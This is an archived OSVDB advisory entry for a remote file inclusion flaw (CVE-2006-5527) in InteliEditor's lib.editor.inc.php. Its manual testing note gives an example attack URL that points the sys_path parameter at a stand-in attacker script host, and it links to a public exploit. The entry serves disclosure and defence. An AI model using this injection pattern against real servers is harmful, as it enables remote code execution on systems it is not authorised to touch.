InteliEditor lib.editor.inc.php sys_path Variable Remote File Inclusion

2006-10-24T07:18:47
ID OSVDB:30011
Type osvdb
Reporter OSVDB
Modified 2006-10-24T07:18:47

Description

Manual Testing Notes

http://[target]/[script_path]/lib.editor.inc.php?sys_path=http://evil_script?

References:

Security Tracker: 1017117 Secunia Advisory ID:22428 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0410.html ISS X-Force ID: 29755 Generic Exploit URL: http://www.milw0rm.com/exploits/2630 FrSIRT Advisory: ADV-2006-4179 CVE-2006-5527 Bugtraq ID: 20703